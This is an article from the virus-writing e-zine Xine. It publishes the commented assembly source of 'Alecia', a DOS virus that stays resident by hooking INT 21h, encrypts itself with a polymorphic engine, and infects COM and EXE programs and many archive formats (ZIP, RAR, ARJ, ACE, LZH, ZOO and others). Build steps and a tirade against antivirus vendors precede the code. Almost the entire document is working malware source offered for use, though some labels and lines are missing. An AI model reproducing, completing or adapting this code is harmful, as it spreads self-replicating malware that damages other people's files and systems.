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Xine - issue #3 - Phile 207
| Xine - issue #3 - Phile 207 |
; t$$t
; `ýý' ,nn.
; .sSSs, ,cccccccc, øüüø
; $TTtt$$Ss. tt ,c¬$$$¬c.
; `ýüý'`S0$Sc `' ,c¬äêê$¬ý ,nããã. $$$$$$$$ý
; ,cC&TT&Cc. `$$SS. `' ,¬$äê$¬ý' êZêZZt ,nt$T$$$$$$$ý
; ,&&&$&t&&&, `$R$S. , ¬$ê$' ,êZZZý' ,$TS$T$$$$$$ý
; &&$&&&' `&v&&0$ $ZZ$S , Cêêý ,ZêZ S$T$ý$$$$$$ý ,
; &&&$$&. ,&&&&ý' ,$$0Z$ , Cêê,. ,;$$$Z. $S$$,.$$$$ý ,$
; `&&&$&&$$$&&&$ .s$$$Z$,x$$$$$$$; `CêêêêêCZZZZ. `$$$$$$$$ý ,$$
; `"üüüüüý'`&&. ,$$$$$$$$$$$$$$$$$, `tCêêêêêêtý'ZZZZZs `$$$$$$ý ,$$$
; `&t,$$$$$$Tý' `ý$$$$t `ýýýýýýý' `ýýýý' øýýýø ýüüü
; `&`ýýýýý' `ýü' Ú------------¿
; . | Star0[iKx] |
; À------------Ù
; Name: Alecia
; Size: 6288 at first generation , variable size after
; Date of birth: 12 may 1998
; Origin: Belgium
; Residency: Hook interrupt 21 ,
; install check: put a delete with no value who return 6969h
; infect: on call 4E/4F by scanning name extension
; Hook interrupt 24
; Hide write protects problems
; Host: COM - Typical + ENUNS supported
; EXE - Typical dos exe with a size < 500k
; ZIP - Drop + Internal file mark
; RAR - Drop + Internal file mark
; ARJ - Drop + Internal file mark
; ACE - Drop + Internal file mark
; HA - Drop + Internal file mark
; ARC/PAK - Drop + Internal file mark
; LZH/LHA - Drop + Internal file mark
; ZOO - Drop + Internal file mark
; Compiling comments : There's a little bug in the poly engine,if the size
; of alicia isn't even, then alicia'll produce hybrid
; children , but if the size is even , everything'll
; work fine without problems.
; I use TASM 4.01 plus TLINK 3.01, so for compilation
; you just need to do in the dos prompt
; TASM alicia.asm -> it's produce an OBJ + MAP
; TLINK -t alicia.obj -> and you have the final COM
; Polymorphism : I have wrote my poly in about 4 days because B0z0
; specially wait for finishing all the work on alicia
; to release it. Sure he is not the best one and have
; a few bad points I'll correct soon but for a poly ,
; I included fake interrupt generator , complex noise;
; genered junk , value are taken from a generated
; table , I aslo included a sliding key , he generate
; also reserved register for the poly himself and
; change it every generation produced , that's take
; from fix value fixed when installing virus in
; memory
; Archive infector : Archive ? hmmm , no I don't know, what's that ? eh,
; okay , the virus drop a copy of himself into the
; archive and fix the virus as an little image
; displayer with a trademark . he infect most know
; archive , If you need more information , see tutes
; Personnal comments : First, I have a word for the scene , sure it's cool
; to produce great tutorials about engines,infects...
; but the theory , everybody take it easy . When you
; want play on the ground, you have fastly a bankrout
; of informations, you often need precise infos about
; a lot of stuff , then no theory without code and no
; code without specification . Take a minute to think
; about that . Secundo for the av scene : Hey guyz
; you earn money with your scanner from virus
; attack , specially you want interrest company , in
; fact you are in a wrong way ! Company, even if they
; are connected on the internet aren't the cible of
; viruses if the computer management is done with a
; correct management . I saw your price in catalog
; and I can say that you profite of the ignorance of
; computer manager who only study C++ at university
; and believe that viruses are things who destroy his
; computer. And it works, then you earn money with my
; work, acceptable ? No ,of course , I take hours and
; hours on programming one virus just for pleasure
; and learning programming. You build a scanner with
; heuristic and scan string and you are happy . What
; can I do against that ? Nothing , but now , av
; companies ( I specially think to this new one who
; begin by I and finish by M ) begin to lie more to
; poeple. Why? because they know your ignorence about
; viruses and provoque panic , earn more money , if
; I could correct the IBM publicity, I'll remplace it
; by : Hey Henri , why are you lying for the count of
; IBM ! It's much better in that way
; - A N Y W A Y I H A T E Y O U -
.model tiny
org 100h
push es ; save segment for exe
push ds
push cs cs ; fix es = cs = ds
pop es ds
not sp ; anti tbclean
not sp
call start_here ; install virus
pop ds ; restore initial segment
pop es
db 0bfh ; equal mov di,offreturn
offreturn: dw offset payload
add di,bp
jmp di
start_here: pop bp ; get the delta offset :]
sub bp,offset start_here-(start_here-TheEnd)
mov ah,2Ah
int 21h
cmp dh,05
jne stcontinue
cmp dl,24
jne stcontinue
call payload
xor cx,cx
mov ax,1369h
int 21h ; check if we are installed
cmp cx,6969h
jnz install ; our check
jmp TheEnd
call polyinit_value ; init value for our poly
mov ax,3521h
int 21h ; get int 21 handler
mov word ptr cs:[bp+Old10S],es ; save 21 offset
mov word ptr cs:[bp+Old10O],bx
mov ah,62h ; install virus into resident
int 21h
push bx ; save bx
push bx ; set es = bx
pop es
push bp
mov bp,10000/16
call allocate ; allocate memory
pop bp
push ax
dec ax
mov es,ax
mov byte ptr es:[0],'Z' ; hide to dos segment
mov word ptr es:[1],08
pop es
pop ds
xor di,di
push di
pop si
mov cx,100h
repz movsb ; put our psp in memory
push cs
pop ds
lea si,[bp+start] ; copy virus
push 100h
pop di
mov cx,fin-start
repz movsb ; put our virus in memory
push ds es
pop ds
mov ax,2521h+1
dec ax
mov dx,offset NewInt_21 ; DS:DX = Int 21 Handler
int 21h ; Set the new handler
pop ds
jmp TheEnd
WeAreAlready: ; test for our presence
mov cx,6969h ; return our mark of presence
NewInt_21: pushf
cmp ax,1369h ; check
je WeAreAlready ; installation
cmp ah,4eh
je infect_4eh
cmp ah,4fh ; check
je infect_4eh ; for infection
JumpTo1: popa
JmpTO21: db 0eah
Old10O: dw 0
Old10S: dw 0
texto: db ?
Do_21: ; make da 21
push cs
call jmpto21 ; make a jump int 21h
popa ; restore all reg
push es ; save es ds
push ds
call Do_21 ; simulate that 4Eh is done
jc skip_4eh ; if error then skip infection proc
mov ah,2Fh ; get dta , get name from dta!
int 21h
push es
push bx
mov word ptr cs:[seghost],es ;
mov ax,word ptr es:[bx+26]
mov dx,word ptr es:[bx+28]
mov word ptr cs:[finallowsize],ax ; save size
mov word ptr cs:[finalhisize],dx
add bx,30
mov word ptr cs:[offhost],bx
call infect_proc ; test for possible infection
pop bx
pop es
mov ax,word ptr cs:[finallowsize]
mov dx,word ptr cs:[finalhisize]
mov word ptr es:[bx+26],ax
mov word ptr es:[bx+28],dx
skip_4Eh: ;
popa ; restore all reg and quit
pop ds
pop es
retf 2 ;
infect_proc: ; infection procedure
call save_state ; save all
call security_check ; check if alarm
jc security_fail
mov si,word ptr cs:[offhost] ; get extension
mov ds,word ptr cs:[seghost]
push ds
push si
call get_host ; check if we can infect this type
jc security_fail ; op file
pop si
mov dx,si
push si
call test_inf ; test if infected
jc security_fail
pop dx
pop ds
push dx
push ds
call preview_condition
jc security_fail ; test poly conditions ( mem )
call openf
jc security_fail ; open for write
push cs cs
call propoly ; generate a poly version of the virus
pop es ds
call di ; infect here
call polydelocator ; uninstall poly from memory
pop ds
pop dx
call closef ; close file
push ax
push bx
security_fail: ; return to the caller
pop bx
pop ax
push cs cs
pop es ds
call restore_state ; restore all condition for the
ret ; continue process
push bx
push ds ; Coded by UnKm'97
inc bp
mov ah,4ah ; modify it at your risk !!!
mov bx,0FFFFh
int 21h ; ask for memory
; but in com , that's equal 0
mov ah,4ah ; now ask
sub bx,bp ; for free memory
int 21h ; and dos does it
dec bp
mov ah,48h ; now , allocate free memory
mov bx,bp ; in a new segment
int 21h
pop ds ; restore all seg
pop bx
delocate: ; delocator
push bx
mov ah,49h
int 21h ; delocate in es
pop bx
mov ah,2Ch ; set a name with the timer 4 digits
int 21h
and cx,0000111100001111b ; then we have 0x 0x in ch
and dx,0000111100001111b ; and 0y 0y in ch
add cx,4141h ; now we have a normal 4 bytes
add dx,4141h ; string
mov word ptr cs:[betaname],cx
mov word ptr cs:[betaname+2],dx
mov word ptr cs:[betaname+4],'C.' ; add .com extension
mov word ptr cs:[betaname+6],'MO'
mov word ptr cs:[betaname+8],0
mov cx,9
crc_calc: ; get crc32 from ds:si
push bx
push si cx
call crc_table ; render crc table
pop cx si
mov bp,cx
mov cx,0ffffh ; reset crc counter to 0ffffffffh
mov dx,0ffffh
xor ax,ax
lodsb ; get byte from ds:si
mov bx,ax
xor bl,cl
mov cl,ch ; calculation
mov ch,dl
mov dl,dh
mov dh,bh
shl bx,1
shl bx,1
xor cx,word ptr cs:[bx+di]
xor dx,word ptr cs:[bx+di+02]
dec bp ; one more
jnz Crc_loop
not dx
not cx
pop bx
crc_table: ; render the table
push es ; save all segment
push ds
push cs
push cs
pop es
pop ds
mov di,offset starttable+1024-2 ; the buffer table
; remember : It begin by the end
mov bp,255 ; set bp equal 255
; 255 * 4 = 1024
std ; set Direction Flag On
TableHighloop: ; the major loop in the Crc table Calc
mov cx,8 ; set the minus loop to 8
mov dx,bp ; dx = bp , major counter loop
xor ax,ax ; ax = zero
shr ax,1 ; mov one byte of ax at right in bin
rcr dx,1 ; if anything losted , put it on dx
jae anomality ; if superior or equal skip encrypt.
xor dx,08320h ; encrypt value by a signature
xor ax,0EDB8h ;
loop TableLowLoop ; make it 8 times
stosw ; write ax
xchg dx,ax
stosw ; not write dx
dec bp ; decrement the counter
jnz TableHighLoop ; repeat it until bp = 0
mov word ptr cs:[di],0 ; last value equal 0
sub di,2
mov word ptr cs:[di],0
cld ; clear direction flag
pop ds
pop es
crc_calc16: ; render crc 16 from ds:si
push bx
push cx
call rendertable ; build the table
pop cx
xor ax,ax
xor bx,bx ; set bx = crc counter to zero
render_loop: ; make crc calculation
xor bl,al
mov al,bh
mov bh,ah
shl bx,1
mov bx,word ptr cs:[bx+starttable]
xor bx,ax
loop render_loop ; make da loop x times
xchg bx,dx
pop bx
rendertable: ; crc16 table
push es ; save seg and fix cs=ds=es
push ds
push cs
push cs
pop es
pop ds
mov bx,0a001h
mov di,offset starttable ; build the table in startable
xor dx,dx
mov ax,dx
mov cx,8
shr ax,1
jae crc16_ja
xor ax,bx
crc16_ja: loop crc16_loop ; make the loop
inc dl
jnz crc_jnz
pop ds
pop es
; go to by dos
xor cx,cx ; called a lot
xor dx,dx
mov ah,42h ; move the point in handle
int 21h
infect_ace: ; ace infection see tute
mov ah,3fh
mov cx,4
mov dx,offset temporary1 ; open file
int 21h
xor cx,cx
mov dx,word ptr cs:[temporary1+2]
add dx,4
xor ax,ax
call gozero ; go to the 1st header +4
mov word ptr cs:[temporary1+512],ax
mov word ptr cs:[temporary1+512+2],dx ; save offset
mov ah,3fh
mov cx,256
push cx
mov dx,offset temporary1
int 21h
pop cx ; read 256 bytes
mov si,offset temporary1
mov di,offset temporary1+256
repz movsb ; copy 1 temporary in tmp+256
call ace_header ; build one ace header
mov bp,offset temporary1+256
mov ax,word ptr cs:[bp+0fh] ; check for our infection
and al,00001111b ; mark
cmp al,00001010b
je ace_invalid
mov ax,word ptr cs:[bp+0fh]
and al,11110000b
add al,00001010b
mov word ptr cs:[bp+0fh],ax ; if so then put our mark
push bp
lea si,[bp+4]
mov cx,word ptr cs:[bp+2]
call crc_calc ; calculate the crc
pop bp
not cx
mov word ptr cs:[bp],cx
mov dx,word ptr cs:[temporary1+512]
mov cx,word ptr cs:[temporary1+512+2]
xor ax,ax
call gozero ; go in the begining
mov ah,40h
mov cx,word ptr cs:[bp+2]
add cx,4
mov dx,bp
int 21h ; and write our header mark
mov al,2
call go
sub bp,256
mov ah,40h ; write our virus header
mov cx,word ptr cs:[bp+2]
add cx,4
mov dx,offset temporary1
int 21h
call write_virus ; write our virus
ACE_header: ; build an header
mov bp,offset temporary1
mov byte ptr cs:[bp+4],01
mov word ptr cs:[bp+5],8001h ; fix file type
mov ax,word ptr cs:[totalsize] ; fix size
mov word ptr cs:[bp+7],ax
mov word ptr cs:[bp+7+2],0
mov word ptr cs:[bp+0Bh],ax
mov word ptr cs:[bp+0Bh+2],0
mov cx,word ptr cs:[precrc32cx]
mov dx,word ptr cs:[precrc32dx] ; fix crc
not dx
not cx
mov word ptr cs:[bp+17h],cx
mov word ptr cs:[bp+17h+2],dx
call set_a_name ; set the name
dec cx
mov word ptr cs:[bp+1Dh+4],cx
mov word ptr cs:[bp+02],cx
add word ptr cs:[bp+02],1Fh
lea di,[bp+1Fh+4]
mov si,offset betaname
repz movsb
push bp
lea si,[bp+4]
mov cx,word ptr cs:[bp+2]
call crc_calc ; get the crc
pop bp
not cx
mov word ptr cs:[bp],cx
infect_arc: ; arc infection see tutes
mov ah,3fh
mov cx,1dh
push cx
mov dx,offset temporary1
push dx
pop bp
int 21h ; read first header
pop cx
mov si,offset temporary1
mov di,offset temporary1+1dh
repz movsb ; put
cmp byte ptr cs:[bp],1Ah ; check if arc
jne ARC_invalid
cmp word ptr cs:[bp+2],'PH'
je ARC_invalid
cmp word ptr cs:[bp+2],'TS' ; check for other type
jne ARC_correct
call ARC_header ; build an header
mov bp,offset temporary1+1dh
mov ax,word ptr cs:[bp+13h] ; check for time stamp if installed
and al,00001111b
cmp al,00001010b
je arc_invalid
mov ax,word ptr cs:[bp+13h]
and al,11110000b
add al,00001010b
mov word ptr cs:[bp+13h],ax
mov al,0
call go
mov ah,40h ; write the header
mov cx,1dh
mov dx,offset temporary1+1Dh
int 21h
mov al,02
call go
sub ax,12
sbb dx,0
push ax
push dx
push ax
push dx
pop cx
pop dx
xor ax,ax
call gozero
mov ah,3fh
mov cx,12
mov dx,offset betaname
int 21h ; save last 12 bytes
cmp byte ptr cs:[betaname],01ah
pop cx
pop dx
xor ax,ax
call gozero
mov ah,40h
mov cx,1dh
mov dx,offset temporary1
int 21h ; write ourheader
call write_virus ; write our virus+betaname
mov ah,40h
mov cx,12
mov dx,offset betaname
int 21h
jmp arc_invalid
ARC_header: ; build an arc header
lea bp,[temporary1]
mov byte ptr cs:[bp+1],2
call set_a_name
lea di,[bp+2]
mov si,offset betaname
repz movsb
mov ax,word ptr cs:[totalsize] ; size
mov word ptr cs:[bp+0fh],ax
mov word ptr cs:[bp+0fh+2],0
mov word ptr cs:[bp+19h],ax
mov word ptr cs:[bp+19h+2],0
mov dx,word ptr cs:[precrc16] ; crc
mov word ptr cs:[bp+17h],dx
infect_arj: ; arj infection see
; tutes
mov ah,3fh
mov cx,256
mov dx,offset temporary1
int 21h
xor ax,ax
call go
cmp word ptr cs:[temporary1],0EA60h ; check integrity
jne invalid_arj
mov ax,word ptr cs:[temporary1+13] ; check mark
and al,00001111b
cmp al,00001010b
je invalid_arj
mov ax,word ptr cs:[temporary1+13]
and al,11110000b
add al,00001010b
mov word ptr cs:[temporary1+13],ax
lea si,[temporary1+4]
mov cx,word ptr cs:[temporary1+2]
push si
push cx
call crc_calc ; get crc32 of the
pop ax ; header
pop si
add si,ax
mov word ptr cs:[si],cx
mov word ptr cs:[si+2],dx
mov cx,ax
cmp word ptr cs:[si+4],0
jne invalid_arj
add cx,8
mov ah,40h
mov dx,offset temporary1
int 21h ; write the virus
xor ax,ax
call go
lea bp,[temporary1]
add bp,word ptr cs:[temporary1+2]
add bp,8
cmp word ptr cs:[bp],0
jne invalid_arj
add bp,2
mov dx,bp
sub dx,offset temporary1
mov cx,0
xor ax,ax
call gozero
mov ah,3fh
mov cx,256
mov dx,offset temporary1+256
push dx
int 21h ; read one header
pop bp
cmp word ptr cs:[bp],0EA60h ; check integrity
je continue_arj
mov byte ptr cs:[bp+09h],0 ; fix the header
mov byte ptr cs:[bp+0Ah],0
mov ax,word ptr cs:[totalsize] ; size
mov word ptr cs:[bp+10h],ax
mov word ptr cs:[bp+10h+2],0
mov word ptr cs:[bp+14h],ax
mov word ptr cs:[bp+14h+2],0
mov cx,word ptr cs:[precrc32cx] ; crc
mov dx,word ptr cs:[precrc32dx]
mov word ptr cs:[bp+18h],cx
mov word ptr cs:[bp+18h+2],dx
call set_a_name ; set a name
mov si,offset betaname
lea di,[bp+1Ch+6]
repz movsb
mov byte ptr cs:[di],0
inc di
lea ax,[di-4]
sub ax,bp
mov word ptr cs:[bp+2],ax
push ax
pop cx
push bp
push di
lea si,[bp+4]
call crc_calc ; get crc of the header
pop di
pop bp
mov word ptr cs:[di],cx
inc di
inc di
mov word ptr cs:[di],dx
inc di
inc di
mov word ptr cs:[di],0
mov ax,2
call go ; go to the end
sub ax,4
sbb dx,0
push dx
push ax
pop dx
pop cx
xor ax,ax
call gozero
mov ah,40h
mov cx,word ptr cs:[bp+2]
add cx,4+6
mov dx,bp
int 21h ; write our header
call write_virus ; wrie our virus
mov word ptr cs:[bp+2],0
mov ah,40h-1
inc ah
mov cx,4
mov dx,bp
int 21h
jmp invalid_arj
infect_com: ; basic com infection
mov ah,3fh-1
inc ah
mov cx,3
mov dx,offset saved
int 21h ; save 3 first byte
cmp byte ptr cs:[saved],'Z'
je fincom
cmp byte ptr cs:[saved],'M'
je fincom ; check for com
mov al,2
call go ; go to the end
sub ax,3
mov word ptr cs:[buffer7+1],ax
mov al,0
call go
mov byte ptr cs:[buffer7],0e9h ; build a jump virus
mov ah,40h-1
mov cx,3
mov dx,offset buffer7
inc ah
int 21h ; write virus
mov al,2
call go
sub ax,7
xchg ax,dx
xor cx,cx
mov ax,4200h
int 21h ; go to the begin
mov ah,3fh
mov cx,7
mov dx,offset buffer7
int 21h ; save last 7 bytes
call polydelocator
call propoly ; reactualize poly
call write_virus ; write the virus
mov cx,word ptr cs:[totalsize]
add cx,7
add word ptr cs:[buffer7+5],cx
mov ah,40h
mov cx,7
mov dx,offset buffer7
int 21h ; upgrade ENUNS mark
return_com: ; return to the host
lea si,[bp+saved]
push 100h
pop di
push di
saved: db 0,0,0
cmp word ptr [finalhisize],7 ; compare exe size
ja close
mov ah,3fh-1
inc ah
mov cx,1ch
lea dx,[temporary1]
int 21h
cmp byte ptr cs:[temporary1],'M' ; check if really
jne close ; an exe
cmp byte ptr cs:[temporary1+1],'Z'
jne close
cmp byte ptr cs:[temporary1+24],64 ; check win
je close
cmp word ptr cs:[temporary1+1ah],0 ; check overlay
jne close
call infectexe ; buil exe header
mov al,0
call go
mov ah,40h
mov cx,1ah
lea dx,[temporary1]
int 21h ; write poly header
mov al,2
call go
call polydelocator
call propoly ; reactualize poly
call write_virus ; write virus
close: ret
infectexe: ; infect exe
mov cx,word ptr cs:[temporary1+14h] ; save the exe_ip/exe_cs
mov dx,word ptr cs:[temporary1+16h]
mov word ptr cs:[exe_ip],cx
mov word ptr cs:[exe_cs],dx
mov al,2
call go ; go to the end
push ax
push dx
push bx
mov bx,word ptr cs:[temporary1+8h] ; reactulize cs:ip
mov cl,4 ; start pointer
shl bx,cl
sub ax,bx
sbb dx,0
mov cx,10h
div cx
mov word ptr cs:[temporary1+14h],dx
mov word ptr cs:[temporary1+16h],ax
pop bx dx ax
push dx
mov dx,word ptr cs:[totalsize] ; reactulize size
add ax,dx
pop dx
adc dx,0
mov cx,512
div cx
inc ax
mov word ptr cs:[temporary1+4],ax
mov word ptr cs:[temporary1+2],dx
mov al,0
call go
return_exe: ; return to the host
mov ax,es
add ax,10h
add word ptr cs:[bp+exe_cs],ax
db 0eah
exe_ip: dw 0
exe_cs: dw 0
infect_ha: ; infect ha , see tutes
mov ah,3fh
mov cx,256
mov dx,offset temporary1
int 21h
cmp word ptr cs:[temporary1],'AH' ; compare ha mark
jne HA_invalid
inc word ptr cs:[temporary1+2]
mov ax,word ptr cs:[temporary1+0dh+4] ; check our infection mark
and al,00001111b
cmp al,00001010b
je ha_invalid
mov ax,word ptr cs:[temporary1+0dh+4]
and al,11110000b
add al,00001010b
mov word ptr cs:[temporary1+0dh+4],ax
mov al,0
call go
mov ah,40h ; write our new header
mov cx,0Dh+4+4
mov dx,offset temporary1
int 21h
mov al,2
call go
call HA_build ; build header
mov ah,40h
mov dx,offset temporary1+4
int 21h ; write header
call write_virus ; write the virus
HA_build: ; build ha header
mov bp,offset temporary1+4
mov byte ptr cs:[bp],20h
inc bp
mov ax,word ptr cs:[totalsize] ; fix the size
mov word ptr cs:[bp],ax
mov word ptr cs:[bp+2],0
add bp,4
mov cx,ax
mov word ptr cs:[bp],cx
mov word ptr cs:[bp+2],0
add bp,4
mov cx,word ptr cs:[precrc32cx]
mov dx,word ptr cs:[precrc32dx]
mov word ptr cs:[bp],cx ; set crc
mov word ptr cs:[bp+2],dx
add bp,8
mov byte ptr cs:[bp],0
inc bp
call set_a_name ; set the name
mov di,bp
add bp,cx
mov si,offset betaname
repz movsb
mov cx,bp
sub cx,offset temporary1+1
mov word ptr cs:[bp],0102h
mov byte ptr cs:[bp+2],20h
infect_lzh: ; infect lzh
mov ah,3fh
mov cx,256
push cx
mov dx,offset temporary1
int 21h ; read 256 first bytes
pop cx
cmp word ptr cs:[temporary1+2],'l-'
jne LZH_invalid
mov si,offset temporary1
lea di,[si+256]
repz movsb
call LZH_header ; build our header
mov bp,offset temporary1+256
mov ax,word ptr cs:[bp+0fh] ; check our virus mark
and al,00001111b
cmp al,00001010b
jne lzh_notinvalid
mov ax,word ptr cs:[bp+0fh]
and al,11110000b
add al,00001010b
mov word ptr cs:[bp+0fh],ax ; fix our mark
xor cx,cx
mov cl,byte ptr cs:[bp]
lea si,[bp+2]
xor ax,ax
LZH_loop1: ; actualize checksum
add ah,byte ptr cs:[si]
inc si
dec cx
jnz LZH_loop1
mov byte ptr cs:[bp+1],ah
xor ax,ax
call go
mov ah,40h ; write new header
mov cx,word ptr cs:[bp]
xor ch,ch
inc cx
inc cx
mov dx,bp
int 21h
mov al,02
call go
sub ax,7
sbb dx,0
push ax
push dx
push ax
push dx
pop cx
pop dx
xor ax,ax
call gozero ; go to the end-7
mov ah,3fh
mov cx,7
push cx
mov dx,offset betaname
push dx
int 21h ; read 7 bytes
pop bp
pop cx
add bp,7 ; check if exist
; zero packet
cmp byte ptr cs:[bp],0
je continue
dec bp
dec cx
jnz testforzero
jmp LZH_invalid
mov bp,cx
pop ax
pop dx
add dx,cx
xchg ax,cx
xor ax,ax
call gozero
mov ah,40h
mov cx,2
add cl,byte ptr cs:[temporary1]
mov dx,offset temporary1
int 21h ; write our header
call write_virus ; write our virus
mov ah,40h
mov cx,7
sub cx,bp
mov dx,offset betaname
add dx,bp
int 21h ; write dead packet
jmp lzh_invalid
LZH_header: ; build lzh header
lea bp,[temporary1]
mov byte ptr cs:[bp+5],'0'
mov ax,word ptr cs:[totalsize] ; fix size
mov word ptr cs:[bp+7],ax
mov word ptr cs:[bp+7+2],0
mov word ptr cs:[bp+7+4],ax
mov word ptr cs:[bp+7+4+2],0
call set_a_name ; set the name
dec cx
mov byte ptr cs:[bp+15h],cl
mov di,bp
add di,16h
mov si,offset betaname
repz movsb
mov dx,word ptr cs:[precrc16] ; the crc
mov word ptr cs:[di],dx
sub di,bp
mov cx,di
mov byte ptr cs:[bp],cl
lea si,[bp+2]
xor ax,ax
LZH_loop1b: ; the checksum
add ah,byte ptr cs:[si]
inc si
dec di
jnz LZH_loop1b
mov byte ptr cs:[bp+1],ah
infect_rar: ; infect rar
mov ah,3fh
mov cx,256
mov dx,offset temporary1
int 21h
cmp word ptr cs:[temporary1],6152h ; check if
jne invalid_rar ; normal rar
lea bp,[temporary1+14h]
cmp word ptr cs:[bp+2],74h ; check if doesn't
je rar_right ; comment exist
mov ax,word ptr cs:[bp+20]
and al,00001111b
cmp al,00001010b
je invalid_rar
mov ax,word ptr cs:[bp+20] ; mark the archive
and al,11110000b
add al,00001010b
mov word ptr cs:[bp+20],ax
push bp
lea si,[bp+2]
mov cx,word ptr cs:[bp+5]
sub cx,2
call crc_calc ; get the crc of the new
; header
pop bp
mov word ptr cs:[bp],cx
xor cx,cx
mov dx,14h
xor ax,ax
call gozero
mov ah,40h
mov cx,word ptr cs:[bp+5]
mov dx,bp
int 21h ; write new header
cmp word ptr cs:[bp+3],8000h ; check if header correct
jne invalid_rar
mov ax,word ptr cs:[totalsize] ; build new header
mov word ptr cs:[bp+07h],ax ; set size
mov word ptr cs:[bp+07h+2],0
mov word ptr cs:[bp+0Bh],ax
mov word ptr cs:[bp+0Bh+2],0
mov cx,word ptr cs:[precrc32cx] ; crc
mov dx,word ptr cs:[precrc32dx]
mov word ptr cs:[bp+10h],cx
mov word ptr cs:[bp+10h+2],dx
mov byte ptr cs:[bp+019h],30h ; compression
call set_a_name ; name
dec cx
mov byte ptr cs:[bp+1Ah],cl
mov word ptr cs:[bp+5],cx
add word ptr cs:[bp+5],20h
mov si,offset betaname
lea di,[bp+20h]
repz movsb ;
mov cx,word ptr cs:[bp+5]
push cx
push bp
sub cx,2
lea si,[bp+2]
call crc_calc ; render crc header
pop bp
mov word ptr cs:[bp],cx
mov ax,2
call go
mov ah,40h
pop cx
mov dx,bp
int 21h
call write_virus ; write the virus
jmp invalid_rar
infect_zip: ; infect zip
mov bp,36000/16
call allocate
jc invalid_zip
mov word ptr cs:[zipseg],ax
mov ah,3fh
mov cx,01Eh
mov dx,offset temporary1
int 21h ; reade one header
cmp word ptr cs:[temporary1],04B50h ; verify integrity
jne invalid_zip
mov ax,word ptr cs:[temporary1+0ah]
and al,00001111b
cmp al,00001010b
je invalid_zip
mov ax,word ptr cs:[temporary1+0ah]
and al,11110000b
add al,00001010b
mov word ptr cs:[temporary1+0ah],ax ; check infected
xor ax,ax
call go
mov ah,40h
mov cx,01Eh
mov dx,offset temporary1
int 21h ; mark as infected
mov ax,2
call go
cmp ax,4000
ja zipsubit
cmp dx,0
jne zipsubit
mov ax,4000
sub ax,4000
sbb dx,0
push ax
push dx
pop cx
pop dx
xor ax,ax
call gozero ; scan the last 5000 bytes
; for the end of central
mov ds,word ptr cs:[zipseg]
mov ah,3fh
mov cx,5000
mov dx,0
push cx
int 21h
pop cx
mov bp,5000
cmp word ptr ds:[bp],04b50h ; end of central
je zip_continue
dec bp
dec cx
jnz zip_testsignature
push cs
mov es,word ptr cs:[zipseg]
mov bp,36000/16
call delocate ; delocate zip
pop es
ret ; return
cmp word ptr ds:[bp+2],0605h
jnz zipozero
mov cx,word ptr ds:[bp+10h+2]
mov dx,word ptr ds:[bp+10h]
cmp word ptr ds:[bp+0ch+2],0
jne invalid_zip
cmp word ptr ds:[bp+0ch],30000 ; check for over limit
ja invalid_zip
xor ax,ax
call gozero
push ax
push dx
mov ah,3fh
mov cx,word ptr ds:[bp+0ch]
mov dx,5000
int 21h
push bp
call Zip_file_header ; build a zip header
pop bp
pop cx
pop dx
xor ax,ax
call gozero
mov word ptr cs:[zipoffst],ax
mov word ptr cs:[zipoffst+2],dx
push ds
push cs
pop ds
mov ah,40h
mov cx,word ptr cs:[namesize]
add cx,1eh
mov dx,offset temporary1
int 21h ; write file header
call write_virus ; write virus
pop ds
mov ax,1
call go
mov word ptr ds:[bp+10h],ax
mov word ptr ds:[bp+10h+2],dx
push bp
call Zip_central ; build central header
pop bp
mov ah,40h
mov cx,word ptr ds:[bp+0Ch]
mov dx,5000
int 21h ; write endofcentral block
push ds
mov ah,40h
mov cx,word ptr cs:[namesize]
add cx,2eh
push cx
push cs
pop ds
mov dx,offset temporary1+256
int 21h ; write our endofcentral pack
pop cx
pop ds
add word ptr ds:[bp+0Ch],cx
mov word ptr ds:[bp+0Ch+2],0
inc word ptr ds:[bp+08h]
inc word ptr ds:[bp+0Ah]
mov ah,40h
mov cx,word ptr ds:[bp+14h]
add cx,16h
mov dx,bp
int 21h ; write the end of central
jmp invalid_zip
push es
push ds
mov si,5000
lea di,[temporary1+256]
push di
mov cx,2Eh
repz movsb
pop bp
push cs
pop ds
mov cx,word ptr cs:[precrc32cx] ; set crc
mov dx,word ptr cs:[precrc32dx]
mov word ptr cs:[bp+10h],cx
mov word ptr cs:[bp+10h+2],dx
mov ax,word ptr cs:[totalsize] ; set size
mov word ptr cs:[bp+14h],ax
mov word ptr cs:[bp+14h+2],0
mov word ptr cs:[bp+18h],ax
mov word ptr cs:[bp+18h+2],0
mov cx,word ptr cs:[namesize]
mov word ptr cs:[bp+1Ch],cx
mov word ptr cs:[bp+24h],0
mov word ptr cs:[bp+0ah],0
mov word ptr cs:[bp+1eh],0
mov word ptr cs:[bp+20h],0
mov ax,word ptr cs:[zipoffst]
mov dx,word ptr cs:[zipoffst+2]
mov word ptr cs:[bp+2ah],ax
mov word ptr cs:[bp+2ah+2],dx
mov si,offset betaname ; set the name
lea di,[bp+2Eh]
repz movsb
pop ds
pop es
push es
push ds
push cs cs
pop ds es
mov bp,offset temporary1
mov word ptr cs:[bp+06h],0
mov word ptr cs:[bp+08h],0
mov word ptr cs:[bp+1Ch],0
mov cx,word ptr cs:[precrc32cx] ; fix the crc
mov dx,word ptr cs:[precrc32dx]
mov word ptr cs:[bp+0Eh],cx ; fix the file offset in zip
mov word ptr cs:[bp+0Eh+2],dx
mov ax,word ptr cs:[totalsize] ; fix the size
mov word ptr cs:[bp+12h],ax
mov word ptr cs:[bp+12h+2],0
mov word ptr cs:[bp+16h],ax
mov word ptr cs:[bp+16h+2],0
call set_a_name ; fix the name
dec cx
mov word ptr cs:[bp+01Ah],cx
mov word ptr cs:[namesize],cx
mov si,offset betaname
lea di,[bp+1Eh]
repz movsb
pop ds
pop es
infect_zoo: ; infect zoo
mov ah,3fh
mov cx,256
mov dx,offset temporary1 ; read first 256 bytes
int 21h
mov si,offset temporary1
add si,word ptr cs:[temporary1+18h]
cmp word ptr cs:[si],0A7DCh ; check validity
jne invalid_zoo
mov al,byte ptr cs:[temporary1+20]
cmp al,byte ptr cs:[test_signature+1]
je invalid_zoo
call zoo_header ; build a zoo header
xor cx,cx
mov dx,20
xor ax,ax
call gozero ; go at 0000020h
mov ah,40h
mov cx,1
mov dx,offset test_signature+1 ; write our signature
int 21h
mov al,2
call go
push ax
push dx
sub ax,96
sbb cx,0
push dx
push ax
pop dx
pop cx
xor ax,ax
call gozero ; goto fin-96
mov ah,3fh
mov cx,96
mov dx,offset temporary1+256
int 21h ; read 96 bytes
mov si,offset temporary1+256+96
cmp word ptr cs:[si],0FDC4h ; test integrity
je test_signature
dec si
dec cx
jnz zoo_scan
pop dx
pop ax
